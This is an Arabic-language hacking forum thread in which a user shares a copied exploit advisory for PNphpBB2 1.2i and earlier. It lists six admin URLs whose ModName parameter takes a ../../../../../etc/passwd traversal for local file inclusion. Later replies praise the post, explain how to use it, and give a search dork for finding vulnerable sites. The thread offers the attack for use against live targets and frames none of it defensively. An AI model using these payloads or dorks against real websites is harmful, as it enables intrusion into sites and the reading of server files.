بسم الله الرحمن الرحيم كيفكم اخواني عساكم بخير يارب ما ابي اطول عليكم بس بصراحه ماني شايف قسم لثغرات المواقع وممكن ما انتبهت قاعد ادور من الصبح ماني...

NEVER HaCKEr

New Member
لعيونكم ثغره برايفت وخاصه PHP
بسم الله الرحمن الرحيم

كيفكم اخواني عساكم بخير يارب ما ابي اطول عليكم بس بصراحه ماني شايف قسم لثغرات المواقع وممكن ما انتبهت قاعد ادور من الصبح ماني ملاقيها المهم بسدحلكم الثغره ودعس موفق ياحلوين

تشاااااااااااااو



كود:
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| PNphpBB2 <= 1.2i (ModName) Multiple LFI Vulnerabilities | Note |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it | register glob 1 |
| download on http://www.pnphpbb.com/ | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Local File Inclusion |
| 1. admin/admin_words.php?ModName=../../../../../etc/passwd |
| 2. admin/admin_groups_reapir.php?ModName=../../../../../etc/passwd |
| 3. admin/admin_smilies.php?ModName=../../../../../etc/passwd |
| 4. admin/admin_ranks.php?ModName=../../../../../etc/passwd |
| 5. admin/admin_styles.php?ModName=../../../../../etc/passwd |
| 6. admin/admin_users.php?ModName=../../../../../etc/passwd |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=-+
[LEFT][/LEFT]


دعس موفق ياشباب تقبلو مروري​
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
لعيونكم ثغره برايفت وخاصه PHP
هاي هيك القوه يا عم والله مبدع

بالنسبه للي يطلب التوضيح
هاي ثغره اسمها لوكال فايل انكلود
اتعلمها رح تفهمها
السكربت المصاب عنا بالثغره
PNphpBB2
طريقه الاستغلال بسيطه جدا
 

NEVER HaCKEr

New Member
لعيونكم ثغره برايفت وخاصه PHP
مشكووور اخي VoLc4n0 على التوضيح واتمنى الكل يستفيد



:00001793[1]:
 

Dr.MwNs

New Member
لعيونكم ثغره برايفت وخاصه PHP
رد: لعيونكم ثغره برايفت وخاصه PHP

مشكور بس ياليت توضح الاني ما فهمت كيف استغلها

1. admin/admin_words.php?ModName=
| 2. admin/admin_groups_reapir.php?ModName=
| 3. admin/admin_smilies.php?ModName= <~ دوركات البحث
| 4. admin/admin_ranks.php?ModName=
| 5. admin/admin_styles.php?ModName=
| 6. admin/admin_users.php?ModName=

او "DoORK= "POWERED BY PNphpBB2 1.2I

الاستغلال بعد علآمة = تضع ../../../../../etc/passwd
 

Dr.MwNs

New Member
لعيونكم ثغره برايفت وخاصه PHP
رد: لعيونكم ثغره برايفت وخاصه PHP

يآ سلآم عليك اخوي ^^

ابدااااااع والله

مع إني ماشفت الثغرة
لكن شي حلو ان الواحد فينا
يكتشف الثغرات بنفسه ^^

تقبل مروري
 
أعلى